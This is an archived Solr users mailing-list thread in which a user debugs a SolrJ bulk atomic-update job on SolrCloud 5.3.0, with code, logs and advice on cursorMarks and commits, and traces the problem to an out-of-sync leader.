think this is > > > wrong. > > > I'm claiming that you should only expect to find as many docs as have > > been > > > indexed since the last time the program ran. > > > > > > As far as the infinite loop is concerned, again trace the logic in the > > old > > > code. > > > Forget about commits and all the mechanics, just look at the logic. > > > You're querying on "sun.org.mozilla*". But you only change if you get a > > > match on > > > "sun.org.mozilla.javascript.internal.NativeString:" > > > > > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That > doc > > > gets > > > returned fr
Re: bulk reindexing 5.3.0 issue
Erick I fixed the "missing content stream" issue as well. by making sure Iam not adding empty list. However, My very first issue of getting zero docs once in a while is still haunting me, even after using cursorMarkers, disabling auto commit and soft commit. I ran code two times and you can see the statement returns zero docs at random times. log.info("Indexed " + count + "/" + docList.getNumFound()); -bash-4.1$ tail -f reindexing.log 2015-09-26 01:44:40 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6500/1440653 2015-09-26 01:44:44 INFO [a.b.c.AdhocCorrectUUID] - Indexed 7000/1439863 2015-09-26 01:44:48 INFO [a.b.c.AdhocCorrectUUID] - Indexed 7500/1439410 2015-09-26 01:44:56 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8000/1438918 2015-09-26 01:45:01 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8500/1438330 2015-09-26 01:45:01 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8500/0 2015-09-26 01:45:06 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! 2015-09-26 01:48:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1437440 2015-09-26 01:48:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1437440 2015-09-26 01:48:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/0 2015-09-26 01:48:22 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 1:17 AM, Ravi Solr <ravis...@gmail.com> wrote: > Erick as per your advise I used cursorMarks (see code below). It was > slightly better but Solr throws Exceptions randomly. Please look at the > code and Stacktrace below > > 2015-09-26 01:00:45 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133 > 2015-09-26 01:00:49 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133 > 2015-09-26 01:00:54 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592 > 2015-09-26 01:00:58 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095 > 2015-09-26 01:01:03 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675 > 2015-09-26 01:01:10 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924 > 2015-09-26 01:01:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445 > 2015-09-26 01:01:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997 > 2015-09-26 01:01:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692 > 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201 > 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing > org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: > Error from server at http://xx.xx.xx.xx:/solr/collection1: missing > content stream > at > org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560) > at > org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234) > at > org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226) > at > org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376) > at > org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799) > at > org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135) > at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107) > at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72) > at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86) > at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97) > at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) > at java.lang.reflect.Method.invoke(Method.java:606) > at com.simontuffs.onejar.Boot.run(Boot.java:306) > at com.simontuffs.onejar.Boot.main(Boot.java:159) > 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! > > > CODE > > protected static void processDocs() { > > try { > CloudSolrClient client = new > CloudSolrClient("zk1:,zk2:,zk3.com:"); > client.setDefaultCollection("collection1"); > > boolean done = false; > String cursorMark = CursorMarkParams.CURSOR_MARK_START; > Integer count = 0; > > while (!done) { > SolrQuery q = new > SolrQuery("*:*").setRows(500).addSort(&
Re: bulk reindexing 5.3.0 issue
Erick & Shawn I incrporated your suggestions. 0. Shut off all other indexing processes. 1. As Shawn mentioned set batch size to 1. 2. Loved Erick's suggestion about not using filter at all and sort by uniqueId and put last known uinqueId as next queries start while still using cursor marks as follows SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" + markerSysId + " TO *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new String[]{"uniqueId","uuid"}); q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); 3. As per Shawn's advise commented autocommit and soft commit in solrconfig.xml and set openSearcher to false and issued MANUAL COMMIT for every batch from code as follows client.commit(true, true, true); Here is what the log statement & results - log.info("Indexed " + count + "/" + docList.getNumFound()); 2015-09-26 17:29:57 INFO [a.b.c.AdhocCorrectUUID] - Indexed 9/1344085 2015-09-26 17:30:30 INFO [a.b.c.AdhocCorrectUUID] - Indexed 10/1334085 2015-09-26 17:33:26 INFO [a.b.c.AdhocCorrectUUID] - Indexed 11/1324085 2015-09-26 17:36:09 INFO [a.b.c.AdhocCorrectUUID] - Indexed 12/1314085 2015-09-26 17:39:42 INFO [a.b.c.AdhocCorrectUUID] - Indexed 13/1304085 2015-09-26 17:43:05 INFO [a.b.c.AdhocCorrectUUID] - Indexed 14/1294085 2015-09-26 17:46:14 INFO [a.b.c.AdhocCorrectUUID] - Indexed 15/1284085 2015-09-26 17:48:22 INFO [a.b.c.AdhocCorrectUUID] - Indexed 16/1274085 2015-09-26 17:48:25 INFO [a.b.c.AdhocCorrectUUID] - Indexed 16/0 2015-09-26 17:48:25 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Ran manually a second time to see if first was fluke. Still same. 2015-09-26 17:55:26 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1/1264716 2015-09-26 17:58:07 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2/1254716 2015-09-26 18:03:09 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3/1244716 2015-09-26 18:06:32 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4/1234716 2015-09-26 18:10:35 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5/1224716 2015-09-26 18:15:23 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6/1214716 2015-09-26 18:15:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6/0 2015-09-26 18:15:26 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Now changed the autommit in solrconfig.xml as follows...Note the soft commit has been shut off as per Shawn's advise 30 false 2015-09-26 18:47:44 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 1/1205451 2015-09-26 18:50:49 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 2/1195451 2015-09-26 18:54:18 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 3/1185451 2015-09-26 18:57:04 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 4/1175451 2015-09-26 19:00:10 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 5/1165451 2015-09-26 19:00:13 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 5/0 2015-09-26 19:00:13 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - FINISHED !!! The query still returned 0 results when they are over million docs available which match uuid:sun.org.mozilla* ...Then why do I get 0 ??? Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 3:49 PM, Ravi Solr <ravis...@gmail.com> wrote: > Thank you Erick & Shawn for taking significant time off your weekends to > debug and explain in great detail. I will try to address the main points > from your emails to provide more situation context for better understanding > of my situation > > 1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs > from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor > which used a Script Transformer. I unwittingly messed up the script and > hence this 'uuid' (String Type field) got messed up. All records prior to > Sep 20 2015 have this issue that I am currently try to rectify. > > 2. Regarding openSearcher=true/false, I had it as false all along in my > 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it > should be left default (Don't exactly remember where I read it), hence, I > removed it from my solrconfig.xml going against my intuition :-) > > 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using > 100 docs batch, which, I later increased to 500 docs per batch. Also it > would not be a infinite loop if I commit for each batch, right !!?? > > 4. Shawn, you are correct the uuid is of String Type and its not unique > key for my schema. My uniqueKey is uniqueId and systemid is of no > consequence here, it's another field for differentiating apps within my > solr. > > Than you very much again guys. I will incorporate your suggestions and > report back. > > Thanks > > Ravi Kiran Bhaskar > &g
Re: bulk reindexing 5.3.0 issue
Thank you Erick & Shawn for taking significant time off your weekends to debug and explain in great detail. I will try to address the main points from your emails to provide more situation context for better understanding of my situation 1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor which used a Script Transformer. I unwittingly messed up the script and hence this 'uuid' (String Type field) got messed up. All records prior to Sep 20 2015 have this issue that I am currently try to rectify. 2. Regarding openSearcher=true/false, I had it as false all along in my 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it should be left default (Don't exactly remember where I read it), hence, I removed it from my solrconfig.xml going against my intuition :-) 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using 100 docs batch, which, I later increased to 500 docs per batch. Also it would not be a infinite loop if I commit for each batch, right !!?? 4. Shawn, you are correct the uuid is of String Type and its not unique key for my schema. My uniqueKey is uniqueId and systemid is of no consequence here, it's another field for differentiating apps within my solr. Than you very much again guys. I will incorporate your suggestions and report back. Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 12:58 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Oh, one more thing. _assuming_ you can't change the indexing process > that gets the docs from the system of record, why not just add an > update processor that does this at index time? See: > https://cwiki.apache.org/confluence/display/solr/Update+Request+Processors > , > in particular the StatelessScriptUpdateProcessorFactory might be a > good candidate. It just takes a bit of javascript (or other scripting > language) and changes the record before it gets indexed. > > FWIW, > Erick > > On Sat, Sep 26, 2015 at 9:52 AM, Shawn Heisey <apa...@elyograg.org> wrote: > > On 9/26/2015 10:41 AM, Shawn Heisey wrote: > >> 30 > > > > This needs to include openSearcher=false, as Erick mentioned. I'm sorry > > I screwed that up: > > > > > > 30 > > false > > > > > > Thanks, > > Shawn >
Re: bulk reindexing 5.3.0 issue
Erick...There is only one type of String "sun.org.mozilla.javascript.internal.NativeString:" and no other variations of that in my index, so no question of missing it. Point taken regarding the CURSORMARK stuff, yes you are correct, my head so numb at this point after working 3 days on this, I wasnt thinking straight. BTW I found the real issue, I have a total of 8 servers in the solr cloud. The leader for this specific collection was the one that was returning 0 for the searches. All other 7 servers had roughly 800K docs still needing the string replacement. So maybe the real issue is sync among servers. Just to prove to myself I shutdown the solr that was giving zero results (i.e. all uuid strings have already been somehow devoid of spurious sun.org.mozilla.javascript.internal.NativeString on that server). Now it ran perfectly fine and is about to finish as last 103K are still left when I was writing this email. So the real question is how can we ensure that the Sync is always maintained and what to do if it ever goes out of Sync, I did see some Jira tickets from previous 4.10.x versions where Sync was an issue. Can you please point me to any doc which says how SolrCloud synchs/replicates ? Thanks, Ravi Kiran Bhaskar Thanks Rvai Kiran Bhaskar On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <erickerick...@gmail.com> wrote: > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially > using > 100 docs batch, which, I later increased to 500 docs per batch. Also it > would not be a infinite loop if I commit for each batch, right !!?? > > That's not the point at all. Look at the basic logic here: > > You run for a while processing 100 (or 500 or 1,000) docs per batch > and change all uuid fields with this statement: > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); > > and then update the doc. You run this as long as you have any docs > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_ > every one that has this string! > > At that point, theoretically, no document in your index has this string. So > running your update program immediately after should find _zero_ documents. > > I've been assuming your complaint is that you don't process 1.4 M docs (in > batches), you process some lower number then exit and you think this is > wrong. > I'm claiming that you should only expect to find as many docs as have been > indexed since the last time the program ran. > > As far as the infinite loop is concerned, again trace the logic in the old > code. > Forget about commits and all the mechanics, just look at the logic. > You're querying on "sun.org.mozilla*". But you only change if you get a > match on > "sun.org.mozilla.javascript.internal.NativeString:" > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That doc > gets > returned from the query but does _not_ get modified because it doesn't > match your pattern. In the older code, it would be found again and > returned next > time you queried. Then not modified again. Eventually you'd be in a > position > where you never changed any docs, just kept getting the same docList back > over and over again. Marching through based on the unique key should not > have the same potential issue. > > You should not be mixing the new query stuff with CURSORMARK. Deep paging > supposes the exact same query is being run over and over and you're > _paging_ > through the results. You're changing the query every time so the results > aren't > very predictable. > > Best, > Erick > > > On Sat, Sep 26, 2015 at 5:01 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Erick & Shawn I incrporated your suggestions. > > > > > > 0. Shut off all other indexing processes. > > 1. As Shawn mentioned set batch size to 1. > > 2. Loved Erick's suggestion about not using filter at all and sort by > > uniqueId and put last known uinqueId as next queries start while still > > using cursor marks as follows > > > > SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" + > > markerSysId + " TO > > *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new > > String[]{"uniqueId","uuid"}); > > q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); > > > > 3. As per Shawn's advise commented autocommit and soft commit in > > solrconfig.xml and set openSearcher to false and issued MANUAL COMMIT for > > every batch from code as follows > > > > client.commit(true, true, true); > > > > Here is what the log statement & results - log.info("Indexed " + count + > > "/" + docList.get
Re: bulk reindexing 5.3.0 issue
Erick as per your advise I used cursorMarks (see code below). It was slightly better but Solr throws Exceptions randomly. Please look at the code and Stacktrace below 2015-09-26 01:00:45 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133 2015-09-26 01:00:49 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133 2015-09-26 01:00:54 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592 2015-09-26 01:00:58 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095 2015-09-26 01:01:03 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675 2015-09-26 01:01:10 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924 2015-09-26 01:01:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445 2015-09-26 01:01:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997 2015-09-26 01:01:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://xx.xx.xx.xx:/solr/collection1: missing content stream at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560) at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234) at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226) at org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376) at org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328) at org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085) at org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856) at org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799) at org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135) at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107) at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72) at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86) at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97) at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:606) at com.simontuffs.onejar.Boot.run(Boot.java:306) at com.simontuffs.onejar.Boot.main(Boot.java:159) 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! CODE protected static void processDocs() { try { CloudSolrClient client = new CloudSolrClient("zk1:,zk2:,zk3.com:"); client.setDefaultCollection("collection1"); boolean done = false; String cursorMark = CursorMarkParams.CURSOR_MARK_START; Integer count = 0; while (!done) { SolrQuery q = new SolrQuery("*:*").setRows(500).addSort("publishtime", ORDER.desc).addSort("uniqueId",ORDER.desc).setFields(new String[]{"uniqueId","uuid"}); q.addFilterQuery(new String[] {"uuid:[* TO *]", "uuid:sun.org.mozilla*"}); q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); QueryResponse resp = client.query(q); String nextCursorMark = resp.getNextCursorMark(); SolrDocumentList docList = resp.getResults(); List inList = new ArrayList(); for(SolrDocument doc : docList) { SolrInputDocument iDoc = ClientUtils.toSolrInputDocument(doc); //This is my system's id String uniqueId = (String) iDoc.getFieldValue("uniqueId"); /* * This is another system's unique id which is what I want to correct that was messed * because of script transformer in DIH import via SolrEntityProcessor * ex- sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f */ String uuid = (String) iDoc.getFieldValue("uuid"); String sanitizedUUID = uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); Map<String,String> fieldModifier = new HashMap<String,String>(1); fieldModifier.put("set",sanitizedUUID); iDoc.setField("uuid", fieldModifier); inList.add(iDoc);
bulk reindexing 5.3.0 issue
I have been trying to re-index the docs (about 1.5 million) as one of the field needed part of string value removed (accidentally introduced). I was issuing a query for 100 docs getting 4 fields and updating the doc (atomic update with "set") via the CloudSolrClient in batches, However from time to time the query returns 0 results, which exits the re-indexing program. I cant understand as to why the cloud returns 0 results when there are 1.4x million docs which have the "accidental" string in them. Is there another way to do bulk massive updates ? Thanks Ravi Kiran Bhaskar
Re: bulk reindexing 5.3.0 issue
No problem Walter, it's all fun. Was just wondering if there was some other good way that I did not know of, that's all Thanks Ravi Kiran Bhaskar On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org> wrote: > Sorry, I did not mean to be rude. The original question did not say that > you don’t have the docs outside of Solr. Some people jump to the advanced > features and miss the simple ones. > > It might be faster to fetch all the docs from Solr and save them in files. > Then modify them. Then reload all of them. No guarantee, but it is worth a > try. > > Good luck. > > wunder > Walter Underwood > wun...@wunderwood.org <javascript:;> > http://observer.wunderwood.org/ (my blog) > > > > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > > > > Walter, Not in a mood for banter right now Its 6:00pm on a friday and > > Iam stuck here trying to figure reindexing issues :-) > > I dont have source of docs so I have to query the SOLR, modify and put it > > back and that is seeming to be quite a task in 5.3.0, I did reindex > several > > times with 4.7.2 in a master slave env without any issue. Since then we > > have moved to cloud and it has been a pain all day. > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org > <javascript:;>> > > wrote: > > > >> Sure. > >> > >> 1. Delete all the docs (no commit). > >> 2. Add all the docs (no commit). > >> 3. Commit. > >> > >> wunder > >> Walter Underwood > >> wun...@wunderwood.org <javascript:;> > >> http://observer.wunderwood.org/ (my blog) > >> > >> > >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > >>> > >>> I have been trying to re-index the docs (about 1.5 million) as one of > the > >>> field needed part of string value removed (accidentally introduced). I > >> was > >>> issuing a query for 100 docs getting 4 fields and updating the doc > >> (atomic > >>> update with "set") via the CloudSolrClient in batches, However from > time > >> to > >>> time the query returns 0 results, which exits the re-indexing program. > >>> > >>> I cant understand as to why the cloud returns 0 results when there are > >> 1.4x > >>> million docs which have the "accidental" string in them. > >>> > >>> Is there another way to do bulk massive updates ? > >>> > >>> Thanks > >>> > >>> Ravi Kiran Bhaskar > >> > >> > >
Re: bulk reindexing 5.3.0 issue
Walter, Not in a mood for banter right now Its 6:00pm on a friday and Iam stuck here trying to figure reindexing issues :-) I dont have source of docs so I have to query the SOLR, modify and put it back and that is seeming to be quite a task in 5.3.0, I did reindex several times with 4.7.2 in a master slave env without any issue. Since then we have moved to cloud and it has been a pain all day. Thanks Ravi Kiran Bhaskar On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org> wrote: > Sure. > > 1. Delete all the docs (no commit). > 2. Add all the docs (no commit). > 3. Commit. > > wunder > Walter Underwood > wun...@wunderwood.org > http://observer.wunderwood.org/ (my blog) > > > > On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com> wrote: > > > > I have been trying to re-index the docs (about 1.5 million) as one of the > > field needed part of string value removed (accidentally introduced). I > was > > issuing a query for 100 docs getting 4 fields and updating the doc > (atomic > > update with "set") via the CloudSolrClient in batches, However from time > to > > time the query returns 0 results, which exits the re-indexing program. > > > > I cant understand as to why the cloud returns 0 results when there are > 1.4x > > million docs which have the "accidental" string in them. > > > > Is there another way to do bulk massive updates ? > > > > Thanks > > > > Ravi Kiran Bhaskar > >
Re: bulk reindexing 5.3.0 issue
Thanks for responding Erick. I set the "start" to zero and "rows" always to 100. I create CloudSolrClient instance and use it to both query as well as index. But I do sleep for 5 secs just to allow for any auto commits. So query --> client.add(100 docs) --> wait --> query again But the weird thing I noticed was that after 8 or 9 batches I.e 800/900 docs the "query again" returns zero docs causing my while loop to exist...so was trying to see if I was doing the right thing or if there is an alternate way to do heavy indexing. Thanks Ravi Kiran Bhaskar On Friday, September 25, 2015, Erick Erickson <erickerick...@gmail.com> wrote: > How are you querying Solr? You say you query for 100 docs, > update then get the next set. What are you using for a marker? > If you're using the start parameter, and somehow a commit is > creeping in things might be weird, especially if you're using any > of the internal Lucene doc IDs. If you're absolutely sure no commits > are taking place even that should be OK. > > The "deep paging" stuff could be helpful here, see: > > https://lucidworks.com/blog/coming-soon-to-solr-efficient-cursor-based-iteration-of-large-result-sets/ > > Best, > Erick > > On Fri, Sep 25, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > > No problem Walter, it's all fun. Was just wondering if there was some > other > > good way that I did not know of, that's all > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org > <javascript:;>> > > wrote: > > > >> Sorry, I did not mean to be rude. The original question did not say that > >> you don’t have the docs outside of Solr. Some people jump to the > advanced > >> features and miss the simple ones. > >> > >> It might be faster to fetch all the docs from Solr and save them in > files. > >> Then modify them. Then reload all of them. No guarantee, but it is > worth a > >> try. > >> > >> Good luck. > >> > >> wunder > >> Walter Underwood > >> wun...@wunderwood.org <javascript:;> <javascript:;> > >> http://observer.wunderwood.org/ (my blog) > >> > >> > >> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com > <javascript:;> > >> <javascript:;>> wrote: > >> > > >> > Walter, Not in a mood for banter right now Its 6:00pm on a friday > and > >> > Iam stuck here trying to figure reindexing issues :-) > >> > I dont have source of docs so I have to query the SOLR, modify and > put it > >> > back and that is seeming to be quite a task in 5.3.0, I did reindex > >> several > >> > times with 4.7.2 in a master slave env without any issue. Since then > we > >> > have moved to cloud and it has been a pain all day. > >> > > >> > Thanks > >> > > >> > Ravi Kiran Bhaskar > >> > > >> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood < > wun...@wunderwood.org <javascript:;> > >> <javascript:;>> > >> > wrote: > >> > > >> >> Sure. > >> >> > >> >> 1. Delete all the docs (no commit). > >> >> 2. Add all the docs (no commit). > >> >> 3. Commit. > >> >> > >> >> wunder > >> >> Walter Underwood > >> >> wun...@wunderwood.org <javascript:;> <javascript:;> > >> >> http://observer.wunderwood.org/ (my blog) > >> >> > >> >> > >> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com > <javascript:;> > >> <javascript:;>> wrote: > >> >>> > >> >>> I have been trying to re-index the docs (about 1.5 million) as one > of > >> the > >> >>> field needed part of string value removed (accidentally > introduced). I > >> >> was > >> >>> issuing a query for 100 docs getting 4 fields and updating the doc > >> >> (atomic > >> >>> update with "set") via the CloudSolrClient in batches, However from > >> time > >> >> to > >> >>> time the query returns 0 results, which exits the re-indexing > program. > >> >>> > >> >>> I cant understand as to why the cloud returns 0 results when there > are > >> >> 1.4x > >> >>> million docs which have the "accidental" string in them. > >> >>> > >> >>> Is there another way to do bulk massive updates ? > >> >>> > >> >>> Thanks > >> >>> > >> >>> Ravi Kiran Bhaskar > >> >> > >> >> > >> > >> >
Re: bulk reindexing 5.3.0 issue
thank you for taking time to help me out. Yes I was not using cursorMark, I will try that next. This is what I was doing, its a bit shabby coding but what can I say my brain was fried :-) FYI this is a side process just to correct a messed up string. The actual indexing process was working all the time as our business owners are a bit petulant about stopping indexing. My autocommit conf and code is given below, as you can see autocommit should fire every 100 docs anyway 100 12 3 private static void processDocs() { try { CloudSolrClient client = new CloudSolrClient("zk1:,zk2:,zk3.com:"); client.setDefaultCollection("collection1"); //First initialize docs SolrDocumentList docList = getDocs(client, 100); Long count = 0L; while (docList != null && docList.size() > 0) { List inList = new ArrayList(); for(SolrDocument doc : docList) { SolrInputDocument iDoc = ClientUtils.toSolrInputDocument(doc); //This is my SOLR's Unique id String uniqueId = (String) iDoc.getFieldValue("uniqueId"); /* * This is another system's id which is what I want to correct. Was messed * because of script transformer in DIH import via SolrEntityProcessor * ex- sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f */ String uuid = (String) iDoc.getFieldValue("uuid"); String sanitizedUUID = uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); Map<String,String> fieldModifier = new HashMap<String,String>(1); fieldModifier.put("set",sanitizedUUID); iDoc.setField("uuid", fieldModifier); inList.add(iDoc); log.info("added " + systemid); } client.add(inList); count = count + docList.size(); log.info("Indexed " + count + "/" + docList.getNumFound()); Thread.sleep(5000); docList = getDocs(client, docList.size()); log.info("Got Docs- " + docList.getNumFound()); } } catch (Exception e) { log.error("Error indexing ", e); } } private static SolrDocumentList getDocs(CloudSolrClient client, Integer rows) { SolrQuery q = new SolrQuery("*:*"); q.setSort("publishtime", ORDER.desc); q.setStart(0); q.setRows(rows); q.addFilterQuery(new String[] {"uuid:[* TO *]", "uuid:sun.org.mozilla*"}); q.setFields(new String[]{"uniqueId","uuid"}); SolrDocumentList docList = null; QueryResponse resp; try { resp = client.query(q); docList = resp.getResults(); } catch (Exception e) { log.error("Error querying " + q.toString(), e); } return docList; } Thanks Ravi Kiran Bhaskar On Fri, Sep 25, 2015 at 10:58 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Wait, query again how? You've got to have something that keeps you > from getting the same 100 docs back so you have to be sorting somehow. > Or you have a high water mark. Or something. Waiting 5 seconds for any > commit also doesn't really make sense to me. I mean how do you know > > 1> that you're going to get a commit (did you explicitly send one from > the client?). > 2> all autowarming will be complete by the time the next query hits? > > Let's see the query you fire. There has to be some kind of marker that > you're using to know when you've gotten through the entire set. > > And I would use much larger batches, I usually update in batches of > 1,000 (excepting if these are very large docs of course). I suspect > you're spending a lot more time sleeping than you need to. I wouldn't > sleep at all in fact. This is one (rare) case I might consider > committing from the client. If you specify the wait for searcher param > (server.commit(true, true), then it doesn't return until a new > searcher is completely opened so your previous updates will be > reflected in your next search. > > Actually, what I'd really do is > 1> turn off all auto commits > 2> go ahead and query/change/update. But the query bits would be using > the cursormark. > 3> do NOT commit > 4> issue a commit when you were all done. > > I bet you'd get through your update a lot fa
Weird Exception
